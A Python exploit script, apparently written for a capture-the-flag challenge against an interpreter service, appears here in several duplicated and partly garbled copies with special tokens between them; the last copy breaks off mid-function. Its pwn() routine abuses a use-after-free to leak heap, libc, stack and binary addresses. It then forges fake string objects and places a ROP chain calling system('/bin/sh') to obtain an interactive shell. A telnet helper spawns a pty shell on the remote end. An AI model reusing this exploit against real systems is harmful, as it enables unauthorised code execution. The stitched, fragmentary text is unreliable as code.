sys.stdout.flush()
except KeyboardInterrupt:
return
except DisconnectException:
print_info('Server disconnected.')
return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def e(d):
"""Encode the given string instance using UTF-8."""
return d.encode('UTF-8')
<|reserved_special_token_0|>
def p32(d):
"""Return d packed as 32-bit unsigned integer (little endian)."""
return pack('<I', d)
def u32(d):
"""Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
return unpack('<I', d)[0]
<|reserved_special_token_0|>
def print_bad(msg):
print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))
def print_info(msg):
print('[*] ' + msg)
<|reserved_special_token_0|>
def validate(data, badchars):
"""Assert that no badchar occurs in data."""
assert all(b not in data for b in badchars)
def is_printable(b):
"""Return true if the given byte is a printable ASCII character."""
return b in e(string.printable)
def hexdump(data):
"""Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
def is_hexdump_printable(b):
return (b in
b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
)
lines = []
chunks = (data[i * 16:i * 16 + 16] for i in range((len(data) + 15) // 16))
for i, chunk in enumerate(chunks):
hexblock = ['{:02x}'.format(b) for b in chunk]
left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])
asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for
b in chunk)
lines.append('{:08x} {:23} {:23} |{}|'.format(i * 16, left,
right, asciiblock))
return '\n'.join(lines)
class Term:
COLOR_BLACK = '30'
COLOR_RED = '31'
COLOR_GREEN = '32'
COLOR_BROWN = '33'
COLOR_BLUE = '34'
COLOR_MAGENTA = '35'
COLOR_CYAN = '36'
COLOR_WHITE = '37'
CLEAR = '0'
UNDERLINE = '4'
BOLD = '1'
ESCAPE_START = '\x1b['
ESCAPE_END = 'm'
<|reserved_special_token_0|>
class DisconnectException(Exception):
pass
class Pattern:
"""De-Bruijn sequence generator."""
alphabet = string.digits + string.ascii_letters
def __init__(self, length):
if length <= len(self.alphabet):
self._seq = self.alphabet[:length]
elif length <= len(self.alphabet) ** 2:
self._seq = self._generate(2)[:length]
elif length <= len(self.alphabet) ** 3:
self._seq = self._generate(3)[:length]
elif length <= len(self.alphabet) ** 4:
self._seq = self._generate(4)[:length]
else:
raise Exception('Pattern length is way to large')
def _generate(self, n):
"""Generate a De Bruijn sequence."""
k = len(self.alphabet)
a = [0] * k * n
sequence = []
def db(t, p):
if t > n:
if n % p == 0:
sequence.extend(a[1:p + 1])
else:
a[t] = a[t - p]
db(t + 1, p)
for j in range(a[t - p] + 1, k):
a[t] = j
db(t + 1, t)
db(1, 1)
return ''.join(self.alphabet[i] for i in sequence)
def bytes(self):
"""Return this sequence as bytes."""
return e(self._seq)
def __str__(self):
"""Return this sequence as string."""
return self._seq
@bytes_and_strings_are_cool
def offset(self, needle):
"""Returns the index of 'needle' in this sequence.
'needle' should be of type string or bytes. If an integer is provided
it will be treated as 32-bit or 64-bit little endian number, depending
on its bit length.
"""
if isinstance(needle, int):
if needle.bit_length() <= 32:
needle = p32(needle)
else:
needle = p64(needle)
needle = d(needle)
idx = self._seq.index(needle)
if self._seq[idx + len(needle):].find(needle) != -1:
raise ValueError('Multiple occurances found!')
return idx
class Channel:
"""Convenience wrapper around a socket."""
OUTGOING_COLOR = Term.COLOR_RED
INCOMING_COLOR = Term.COLOR_BLUE
def __init__(self, sock, verbose):
self._s = sock
self._verbose = verbose
self._buf = bytearray()
def _prettyprint(self, data, outgoing):
"""Prettyprint the given data.
This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
Everything else is converted to hex, then printed in bold and underline for visibility.
Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
detected in arbitrary binary streams.
"""
TEXT = 0
BINARY = 1
X = 4
Y = 16
Z = 2
color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
parts = []
curr = ''
for b in data:
if is_printable(b):
parts.append((TEXT, b))
else:
parts.append((BINARY, b))
i = 0
mergedparts = []
while i < len(parts):
t = parts[i][0]
arr = [parts[i][1]]
j = i + 1
while j < len(parts) and parts[j][0] == t:
arr.append(parts[j][1])
j += 1
i = j
extra = []
if t == TEXT and len(arr) > Y and i < len(parts) - 1:
mid = len(arr) - Z - 1
start, end = mid, mid
char = arr[mid]
while start >= 0 and arr[start] == char:
start -= 1
while end < len(arr) and arr[end] == char:
end += 1
if end - start >= Y + 2 and end < len(parts):
extra = arr[end:]
arr = arr[:end]
mergedparts.append((t, bytes(arr)))
if extra:
mergedparts.append((BINARY, bytes(extra)))
parts = mergedparts
buf = ''
last = None
for tag, value in parts:
if tag == TEXT and len(value) <= X and last == BINARY:
tag = BINARY
if tag == TEXT:
buf += ansi(Term.CLEAR) + ansi(color)
else:
buf += ansi(color, Term.BOLD, Term.UNDERLINE)
value = hexlify(value)
buf += d(value)
last = tag
buf += ansi(Term.CLEAR)
print(buf, end='')
sys.stdout.flush()
def setVerbose(self, verbose):
"""Set verbosity of this channel."""
self._verbose = verbose
def recv(self, n=4096):
"""Return up to n bytes of data from the remote end.
Buffers incoming data internally.
NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
"""
if len(self._buf) < n:
buf = self._s.recv(65536)
if not buf and not self._buf:
raise DisconnectException('Server disconnected.')
if self._verbose:
self._prettyprint(buf, False)
self._buf += buf
buf = self._buf[:n]
self._buf = self._buf[n:]
return buf
def recvn(self, n):
"""Return exactly n bytes of data from the remote end."""
data = []
while len(data) != n:
data.append(self.recv(1))
return b''.join(data)
@bytes_and_strings_are_cool
def recvtil(self, delim):
"""Read data from the remote end until delim is found in the data.
The first occurance of delim is included in the returned buffer.
"""
buf = b''
while not delim in buf:
buf += self.recv(1)
return buf
def recvregex(self, regex):
"""Receive incoming data until it matches the given regex.
Returns the match object.
IMPORTANT: Since the data is coming from the network, it's usually
a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
will return as soon as 'addr: 0xf' is read. Instead, make sure to
end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
"""
if isinstance(regex, str):
regex = re.compile(regex)
buf = ''
match = None
while not match:
buf += d(self.recv(1))
match = regex.search(buf)
return match
def recvline(self):
"""Receive and return a line from the remote end.
The trailing newline character will be included in the returned buffer.
"""
return self.recvtil('\n')
def send(self, buf):
"""Send all data in buf to the remote end."""
if self._verbose:
self._prettyprint(buf, True)
self._s.sendall(buf)
def sendnum(self, n):
"""Send the string representation of n followed by a newline character."""
self.sendline(str(n))
@bytes_and_strings_are_cool
def sendline(self, l):
"""Prepend a newline to l and send everything to the remote end."""
self.send(l + b'\n')
def interact(self):
"""Interact with the remote end: connect stdout and stdin to the socket."""
self._verbose = False
try:
while True:
available, _, _ = select.select([sys.stdin, self._s], [], [])
for src in available:
if src == sys.stdin:
data = sys.stdin.buffer.read1(1024)
self.send(data)
else:
data = self.recv(4096)
sys.stdout.buffer.write(data)
sys.stdout.flush()
except KeyboardInterrupt:
return
except DisconnectException:
print_info('Server disconnected.')
return
<|reserved_special_token_0|>
def send(b):
c.send(b)
def sendline(l):
c.sendline(l)
def sendnum(n):
c.sendnum(n)
<|reserved_special_token_0|>
def recvtil(delim):
return c.recvtil(delim)
<|reserved_special_token_0|>
def interact():
c.interact()
<|reserved_special_token_0|>
def readvar(name):
evl('=')
recvtil('Bad token: 0-1\n> ')
evl(name)
response = recvtil('> ')
return response.split(b'\n')[0]
def readintvar(name):
return int(d(readvar(name)))
<|reserved_special_token_0|>
def gc(remaining):
"""Trigger gargabe collection"""
for i in range(remaining):
evl('{}'.format(i))
def leak(addr, length):
"""Leaks process memory by abusing the UAF to temporarily inject a fake string."""
fake_str_addr = heap_base + 176
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"')
for i in range(15):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
gc(16)
return readstrvar('a')[0:length]
<|reserved_special_token_0|>
def pwn():
global heap_base
recvtil('>')
evl('x="XXXXXXXXXXXXXXXX"')
heap_base = heapleak()
print_good('Heap base @ 0x{:x}'.format(heap_base))
evl('"{}"'.format('A' * 256))
gc(20 - 4)
heap_mem = leak(heap_base, 4096)
for i in range(0, len(heap_mem) - 16, 8):
flink = u64(heap_mem[i:i + 8])
blink = u64(heap_mem[i + 8:i + 16])
if (abs(flink - heap_base) > 65536 and flink > 139637976727552 and
flink < 140737488355328 and blink > 139637976727552 and blink <
140737488355328):
break
else:
print_bad('No freelist pointers found :(')
return
libc = flink - 3938600
print_good('libc @ 0x{:x}'.format(libc))
env_ptr = u64(leak2(libc + 3949728, 8))
print_good('stack @ 0x{:x}'.format(env_ptr))
system = libc + 288144
bin_sh = libc + 1573123
pop_rdi = libc + 142234
pop_rsi = libc + 149637
pop_rdx = libc + 7054
add_rsp_0x48 = libc + 1006475
print_good('/bin/sh @ 0x{:x}'.format(bin_sh))
input_buf = env_ptr - 808
print_good('input_buf @ 0x{:x}'.format(input_buf))
ret_addr = env_ptr - 808 - 8
print_good('return address @ 0x{:x}'.format(ret_addr))
evl('l.a=x')
evl('h.a=x')
evl('a.a=x')
evl('b.a=x')
evl('c.a=x')
evl('d.a=x')
evl('e.a=x')
evl('f.a=x')
for i in range(9):
evl('"{}"'.format('A' * 16))
evl('1337')
for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
for p in ALPHABET:
evl('{}.{}=x'.format(o, p))
for i in range(6):
evl('1337')
for i in 'ghijk':
evl('{}=x'.format(i))
fake_str = p64(18446744073709551615 - 15 - (384 - 16)) + p64(71748523475265
) + b'D' * 240
evl(b'n="' + fake_str + b'"')
payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 256) + p64(
input_buf - 7)
payload += b'\x00' * (384 - len(payload))
evl(b'o="' + payload + b'"')
fake_str_addr = heap_base + 7808
evl('p=o+{}'.format(fake_str_addr))
payload = b'A' * 256
payload += p64(1) + p64(input_buf + 16 + 256 + 24) + p64(0)
payload += p64(8) + p64(ret_addr)
evl(payload)
binary = readstrvar('p')
binary = u64(binary) - 2769
print_good('binary @ 0x{:x}'.format(binary))
offset_to_ret = ret_addr - (input_buf & 18446744073709551360)
print_good('offset to return address: 0x{:x}'.format(offset_to_ret))
if offset_to_ret > 40 or offset_to_ret < 0:
print_bad('Bad offset')
return
prop_name = p64(binary + 2761)[1]
if prop_name < ord('A') or prop_name > ord('z'):
print_bad('Bad propery name: {}'.format(prop_name))
return
prop_name = chr(prop_name)
print_good('property name: {}'.format(prop_name))
payload = b'A' * 56
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
validate(payload, [b'\n'])
evl(payload)
evl('{}=42'.format(prop_name))
payload = b'A' * offset_to_ret
payload += p64(add_rsp_0x48)
validate(payload, [b'\n'])
evl(payload)
time.sleep(0.5)
interact()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def e(d):
"""Encode the given string instance using UTF-8."""
return d.encode('UTF-8')
def d(d):
"""Decode the given bytes instance using UTF-8."""
return d.decode('UTF-8')
def p32(d):
"""Return d packed as 32-bit unsigned integer (little endian)."""
return pack('<I', d)
def u32(d):
"""Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
return unpack('<I', d)[0]
def p64(d):
"""Return d packed as 64-bit unsigned integer (little endian)."""
return pack('<Q', d)
def u64(d):
"""Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian)."""
return unpack('<Q', d)[0]
def print_good(msg):
print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))
def print_bad(msg):
print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))
def print_info(msg):
print('[*] ' + msg)
def bytes_and_strings_are_cool(func):
"""Decorator to encode arguments that are string instances."""
def inner(*args, **kwargs):
nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else
arg, args))
nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else
(k, v), kwargs))
return func(*nargs, **nkwargs)
return inner
def validate(data, badchars):
"""Assert that no badchar occurs in data."""
assert all(b not in data for b in badchars)
def is_printable(b):
"""Return true if the given byte is a printable ASCII character."""
return b in e(string.printable)
def hexdump(data):
"""Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
def is_hexdump_printable(b):
return (b in
b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
)
lines = []
chunks = (data[i * 16:i * 16 + 16] for i in range((len(data) + 15) // 16))
for i, chunk in enumerate(chunks):
hexblock = ['{:02x}'.format(b) for b in chunk]
left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])
asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for
b in chunk)
lines.append('{:08x} {:23} {:23} |{}|'.format(i * 16, left,
right, asciiblock))
return '\n'.join(lines)
class Term:
COLOR_BLACK = '30'
COLOR_RED = '31'
COLOR_GREEN = '32'
COLOR_BROWN = '33'
COLOR_BLUE = '34'
COLOR_MAGENTA = '35'
COLOR_CYAN = '36'
COLOR_WHITE = '37'
CLEAR = '0'
UNDERLINE = '4'
BOLD = '1'
ESCAPE_START = '\x1b['
ESCAPE_END = 'm'
def ansi(*args):
"""Construct an ANSI terminal escape code."""
code = Term.ESCAPE_START
code += ';'.join(args)
code += Term.ESCAPE_END
return code
class DisconnectException(Exception):
pass
class Pattern:
"""De-Bruijn sequence generator."""
alphabet = string.digits + string.ascii_letters
def __init__(self, length):
if length <= len(self.alphabet):
self._seq = self.alphabet[:length]
elif length <= len(self.alphabet) ** 2:
self._seq = self._generate(2)[:length]
elif length <= len(self.alphabet) ** 3:
self._seq = self._generate(3)[:length]
elif length <= len(self.alphabet) ** 4:
self._seq = self._generate(4)[:length]
else:
raise Exception('Pattern length is way to large')
def _generate(self, n):
"""Generate a De Bruijn sequence."""
k = len(self.alphabet)
a = [0] * k * n
sequence = []
def db(t, p):
if t > n:
if n % p == 0:
sequence.extend(a[1:p + 1])
else:
a[t] = a[t - p]
db(t + 1, p)
for j in range(a[t - p] + 1, k):
a[t] = j
db(t + 1, t)
db(1, 1)
return ''.join(self.alphabet[i] for i in sequence)
def bytes(self):
"""Return this sequence as bytes."""
return e(self._seq)
def __str__(self):
"""Return this sequence as string."""
return self._seq
@bytes_and_strings_are_cool
def offset(self, needle):
"""Returns the index of 'needle' in this sequence.
'needle' should be of type string or bytes. If an integer is provided
it will be treated as 32-bit or 64-bit little endian number, depending
on its bit length.
"""
if isinstance(needle, int):
if needle.bit_length() <= 32:
needle = p32(needle)
else:
needle = p64(needle)
needle = d(needle)
idx = self._seq.index(needle)
if self._seq[idx + len(needle):].find(needle) != -1:
raise ValueError('Multiple occurances found!')
return idx
class Channel:
"""Convenience wrapper around a socket."""
OUTGOING_COLOR = Term.COLOR_RED
INCOMING_COLOR = Term.COLOR_BLUE
def __init__(self, sock, verbose):
self._s = sock
self._verbose = verbose
self._buf = bytearray()
def _prettyprint(self, data, outgoing):
"""Prettyprint the given data.
This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
Everything else is converted to hex, then printed in bold and underline for visibility.
Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
detected in arbitrary binary streams.
"""
TEXT = 0
BINARY = 1
X = 4
Y = 16
Z = 2
color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
parts = []
curr = ''
for b in data:
if is_printable(b):
parts.append((TEXT, b))
else:
parts.append((BINARY, b))
i = 0
mergedparts = []
while i < len(parts):
t = parts[i][0]
arr = [parts[i][1]]
j = i + 1
while j < len(parts) and parts[j][0] == t:
arr.append(parts[j][1])
j += 1
i = j
extra = []
if t == TEXT and len(arr) > Y and i < len(parts) - 1:
mid = len(arr) - Z - 1
start, end = mid, mid
char = arr[mid]
while start >= 0 and arr[start] == char:
start -= 1
while end < len(arr) and arr[end] == char:
end += 1
if end - start >= Y + 2 and end < len(parts):
extra = arr[end:]
arr = arr[:end]
mergedparts.append((t, bytes(arr)))
if extra:
mergedparts.append((BINARY, bytes(extra)))
parts = mergedparts
buf = ''
last = None
for tag, value in parts:
if tag == TEXT and len(value) <= X and last == BINARY:
tag = BINARY
if tag == TEXT:
buf += ansi(Term.CLEAR) + ansi(color)
else:
buf += ansi(color, Term.BOLD, Term.UNDERLINE)
value = hexlify(value)
buf += d(value)
last = tag
buf += ansi(Term.CLEAR)
print(buf, end='')
sys.stdout.flush()
def setVerbose(self, verbose):
"""Set verbosity of this channel."""
self._verbose = verbose
def recv(self, n=4096):
"""Return up to n bytes of data from the remote end.
Buffers incoming data internally.
NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
"""
if len(self._buf) < n:
buf = self._s.recv(65536)
if not buf and not self._buf:
raise DisconnectException('Server disconnected.')
if self._verbose:
self._prettyprint(buf, False)
self._buf += buf
buf = self._buf[:n]
self._buf = self._buf[n:]
return buf
def recvn(self, n):
"""Return exactly n bytes of data from the remote end."""
data = []
while len(data) != n:
data.append(self.recv(1))
return b''.join(data)
@bytes_and_strings_are_cool
def recvtil(self, delim):
"""Read data from the remote end until delim is found in the data.
The first occurance of delim is included in the returned buffer.
"""
buf = b''
while not delim in buf:
buf += self.recv(1)
return buf
def recvregex(self, regex):
"""Receive incoming data until it matches the given regex.
Returns the match object.
IMPORTANT: Since the data is coming from the network, it's usually
a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
will return as soon as 'addr: 0xf' is read. Instead, make sure to
end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
"""
if isinstance(regex, str):
regex = re.compile(regex)
buf = ''
match = None
while not match:
buf += d(self.recv(1))
match = regex.search(buf)
return match
def recvline(self):
"""Receive and return a line from the remote end.
The trailing newline character will be included in the returned buffer.
"""
return self.recvtil('\n')
def send(self, buf):
"""Send all data in buf to the remote end."""
if self._verbose:
self._prettyprint(buf, True)
self._s.sendall(buf)
def sendnum(self, n):
"""Send the string representation of n followed by a newline character."""
self.sendline(str(n))
@bytes_and_strings_are_cool
def sendline(self, l):
"""Prepend a newline to l and send everything to the remote end."""
self.send(l + b'\n')
def interact(self):
"""Interact with the remote end: connect stdout and stdin to the socket."""
self._verbose = False
try:
while True:
available, _, _ = select.select([sys.stdin, self._s], [], [])
for src in available:
if src == sys.stdin:
data = sys.stdin.buffer.read1(1024)
self.send(data)
else:
data = self.recv(4096)
sys.stdout.buffer.write(data)
sys.stdout.flush()
except KeyboardInterrupt:
return
except DisconnectException:
print_info('Server disconnected.')
return
def telnet(shell='/bin/bash'):
"""Telnet emulation.
Opens a PTY on the remote end and connects the master side to the socket.
Then spawns a shell connected to the slave end and puts the controlling TTY
on the local machine into raw mode.
Result: Something similar to a telnet/(plaintext)ssh session.
Vim, htop, su, less, etc. will work with this.
!!! This function only works if the channel is connected to a shell !!!
"""
assert sys.stdin.isatty()
c.setVerbose(False)
code = "import pty; pty.spawn(['{}', '-i'])".format(shell)
sendline('python -c "{}"; exit'.format(code))
time.sleep(0.5)
old_settings = termios.tcgetattr(sys.stdin.fileno())
tty.setraw(sys.stdin)
cols, rows = os.get_terminal_size(sys.stdin.fileno())
sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
recvtil('READY\r\n')
recvtil('READY\r\n')
interact()
termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
def send(b):
c.send(b)
def sendline(l):
c.sendline(l)
def sendnum(n):
c.sendnum(n)
<|reserved_special_token_0|>
def recvtil(delim):
return c.recvtil(delim)
def recvn(n):
return c.recvn(n)
def recvline():
return c.recvline()
def recvregex(r):
return c.recvregex(r)
def interact():
c.interact()
<|reserved_special_token_0|>
def evl(code):
sendline(code)
def readvar(name):
evl('=')
recvtil('Bad token: 0-1\n> ')
evl(name)
response = recvtil('> ')
return response.split(b'\n')[0]
def readintvar(name):
return int(d(readvar(name)))
def readstrvar(name):
return readvar(name)[1:-1]
def heapleak():
"""Free the lhs and rhs values during add_assign. ..."""
for i in range(16):
evl('{}'.format(i))
evl('h=0+0')
return readintvar('h') & 18446744073709547520
def gc(remaining):
"""Trigger gargabe collection"""
for i in range(remaining):
evl('{}'.format(i))
def leak(addr, length):
"""Leaks process memory by abusing the UAF to temporarily inject a fake string."""
fake_str_addr = heap_base + 176
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"')
for i in range(15):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
gc(16)
return readstrvar('a')[0:length]
def leak2(addr, length):
"""Same as above, but different offsets..."""
fake_str_addr = heap_base + 368
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"')
for i in range(12):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
return readstrvar('a')[0:length]
def pwn():
global heap_base
recvtil('>')
evl('x="XXXXXXXXXXXXXXXX"')
heap_base = heapleak()
print_good('Heap base @ 0x{:x}'.format(heap_base))
evl('"{}"'.format('A' * 256))
gc(20 - 4)
heap_mem = leak(heap_base, 4096)
for i in range(0, len(heap_mem) - 16, 8):
flink = u64(heap_mem[i:i + 8])
blink = u64(heap_mem[i + 8:i + 16])
if (abs(flink - heap_base) > 65536 and flink > 139637976727552 and
flink < 140737488355328 and blink > 139637976727552 and blink <
140737488355328):
break
else:
print_bad('No freelist pointers found :(')
return
libc = flink - 3938600
print_good('libc @ 0x{:x}'.format(libc))
env_ptr = u64(leak2(libc + 3949728, 8))
print_good('stack @ 0x{:x}'.format(env_ptr))
system = libc + 288144
bin_sh = libc + 1573123
pop_rdi = libc + 142234
pop_rsi = libc + 149637
pop_rdx = libc + 7054
add_rsp_0x48 = libc + 1006475
print_good('/bin/sh @ 0x{:x}'.format(bin_sh))
input_buf = env_ptr - 808
print_good('input_buf @ 0x{:x}'.format(input_buf))
ret_addr = env_ptr - 808 - 8
print_good('return address @ 0x{:x}'.format(ret_addr))
evl('l.a=x')
evl('h.a=x')
evl('a.a=x')
evl('b.a=x')
evl('c.a=x')
evl('d.a=x')
evl('e.a=x')
evl('f.a=x')
for i in range(9):
evl('"{}"'.format('A' * 16))
evl('1337')
for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
for p in ALPHABET:
evl('{}.{}=x'.format(o, p))
for i in range(6):
evl('1337')
for i in 'ghijk':
evl('{}=x'.format(i))
fake_str = p64(18446744073709551615 - 15 - (384 - 16)) + p64(71748523475265
) + b'D' * 240
evl(b'n="' + fake_str + b'"')
payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 256) + p64(
input_buf - 7)
payload += b'\x00' * (384 - len(payload))
evl(b'o="' + payload + b'"')
fake_str_addr = heap_base + 7808
evl('p=o+{}'.format(fake_str_addr))
payload = b'A' * 256
payload += p64(1) + p64(input_buf + 16 + 256 + 24) + p64(0)
payload += p64(8) + p64(ret_addr)
evl(payload)
binary = readstrvar('p')
binary = u64(binary) - 2769
print_good('binary @ 0x{:x}'.format(binary))
offset_to_ret = ret_addr - (input_buf & 18446744073709551360)
print_good('offset to return address: 0x{:x}'.format(offset_to_ret))
if offset_to_ret > 40 or offset_to_ret < 0:
print_bad('Bad offset')
return
prop_name = p64(binary + 2761)[1]
if prop_name < ord('A') or prop_name > ord('z'):
print_bad('Bad propery name: {}'.format(prop_name))
return
prop_name = chr(prop_name)
print_good('property name: {}'.format(prop_name))
payload = b'A' * 56
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
validate(payload, [b'\n'])
evl(payload)
evl('{}=42'.format(prop_name))
payload = b'A' * offset_to_ret
payload += p64(add_rsp_0x48)
validate(payload, [b'\n'])
evl(payload)
time.sleep(0.5)
interact()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def e(d):
"""Encode the given string instance using UTF-8."""
return d.encode('UTF-8')
def d(d):
"""Decode the given bytes instance using UTF-8."""
return d.decode('UTF-8')
def p32(d):
"""Return d packed as 32-bit unsigned integer (little endian)."""
return pack('<I', d)
def u32(d):
"""Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
return unpack('<I', d)[0]
def p64(d):
"""Return d packed as 64-bit unsigned integer (little endian)."""
return pack('<Q', d)
def u64(d):
"""Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian)."""
return unpack('<Q', d)[0]
def print_good(msg):
print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))
def print_bad(msg):
print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))
def print_info(msg):
print('[*] ' + msg)
def bytes_and_strings_are_cool(func):
"""Decorator to encode arguments that are string instances."""
def inner(*args, **kwargs):
nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else
arg, args))
nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else
(k, v), kwargs))
return func(*nargs, **nkwargs)
return inner
def validate(data, badchars):
"""Assert that no badchar occurs in data."""
assert all(b not in data for b in badchars)
def is_printable(b):
"""Return true if the given byte is a printable ASCII character."""
return b in e(string.printable)
def hexdump(data):
"""Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
def is_hexdump_printable(b):
return (b in
b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
)
lines = []
chunks = (data[i * 16:i * 16 + 16] for i in range((len(data) + 15) // 16))
for i, chunk in enumerate(chunks):
hexblock = ['{:02x}'.format(b) for b in chunk]
left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])
asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for
b in chunk)
lines.append('{:08x} {:23} {:23} |{}|'.format(i * 16, left,
right, asciiblock))
return '\n'.join(lines)
class Term:
COLOR_BLACK = '30'
COLOR_RED = '31'
COLOR_GREEN = '32'
COLOR_BROWN = '33'
COLOR_BLUE = '34'
COLOR_MAGENTA = '35'
COLOR_CYAN = '36'
COLOR_WHITE = '37'
CLEAR = '0'
UNDERLINE = '4'
BOLD = '1'
ESCAPE_START = '\x1b['
ESCAPE_END = 'm'
def ansi(*args):
"""Construct an ANSI terminal escape code."""
code = Term.ESCAPE_START
code += ';'.join(args)
code += Term.ESCAPE_END
return code
class DisconnectException(Exception):
pass
class Pattern:
"""De-Bruijn sequence generator."""
alphabet = string.digits + string.ascii_letters
def __init__(self, length):
if length <= len(self.alphabet):
self._seq = self.alphabet[:length]
elif length <= len(self.alphabet) ** 2:
self._seq = self._generate(2)[:length]
elif length <= len(self.alphabet) ** 3:
self._seq = self._generate(3)[:length]
elif length <= len(self.alphabet) ** 4:
self._seq = self._generate(4)[:length]
else:
raise Exception('Pattern length is way to large')
def _generate(self, n):
"""Generate a De Bruijn sequence."""
k = len(self.alphabet)
a = [0] * k * n
sequence = []
def db(t, p):
if t > n:
if n % p == 0:
sequence.extend(a[1:p + 1])
else:
a[t] = a[t - p]
db(t + 1, p)
for j in range(a[t - p] + 1, k):
a[t] = j
db(t + 1, t)
db(1, 1)
return ''.join(self.alphabet[i] for i in sequence)
def bytes(self):
"""Return this sequence as bytes."""
return e(self._seq)
def __str__(self):
"""Return this sequence as string."""
return self._seq
@bytes_and_strings_are_cool
def offset(self, needle):
"""Returns the index of 'needle' in this sequence.
'needle' should be of type string or bytes. If an integer is provided
it will be treated as 32-bit or 64-bit little endian number, depending
on its bit length.
"""
if isinstance(needle, int):
if needle.bit_length() <= 32:
needle = p32(needle)
else:
needle = p64(needle)
needle = d(needle)
idx = self._seq.index(needle)
if self._seq[idx + len(needle):].find(needle) != -1:
raise ValueError('Multiple occurances found!')
return idx
class Channel:
"""Convenience wrapper around a socket."""
OUTGOING_COLOR = Term.COLOR_RED
INCOMING_COLOR = Term.COLOR_BLUE
def __init__(self, sock, verbose):
self._s = sock
self._verbose = verbose
self._buf = bytearray()
def _prettyprint(self, data, outgoing):
"""Prettyprint the given data.
This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
Everything else is converted to hex, then printed in bold and underline for visibility.
Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
detected in arbitrary binary streams.
"""
TEXT = 0
BINARY = 1
X = 4
Y = 16
Z = 2
color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
parts = []
curr = ''
for b in data:
if is_printable(b):
parts.append((TEXT, b))
else:
parts.append((BINARY, b))
i = 0
mergedparts = []
while i < len(parts):
t = parts[i][0]
arr = [parts[i][1]]
j = i + 1
while j < len(parts) and parts[j][0] == t:
arr.append(parts[j][1])
j += 1
i = j
extra = []
if t == TEXT and len(arr) > Y and i < len(parts) - 1:
mid = len(arr) - Z - 1
start, end = mid, mid
char = arr[mid]
while start >= 0 and arr[start] == char:
start -= 1
while end < len(arr) and arr[end] == char:
end += 1
if end - start >= Y + 2 and end < len(parts):
extra = arr[end:]
arr = arr[:end]
mergedparts.append((t, bytes(arr)))
if extra:
mergedparts.append((BINARY, bytes(extra)))
parts = mergedparts
buf = ''
last = None
for tag, value in parts:
if tag == TEXT and len(value) <= X and last == BINARY:
tag = BINARY
if tag == TEXT:
buf += ansi(Term.CLEAR) + ansi(color)
else:
buf += ansi(color, Term.BOLD, Term.UNDERLINE)
value = hexlify(value)
buf += d(value)
last = tag
buf += ansi(Term.CLEAR)
print(buf, end='')
sys.stdout.flush()
def setVerbose(self, verbose):
"""Set verbosity of this channel."""
self._verbose = verbose
def recv(self, n=4096):
"""Return up to n bytes of data from the remote end.
Buffers incoming data internally.
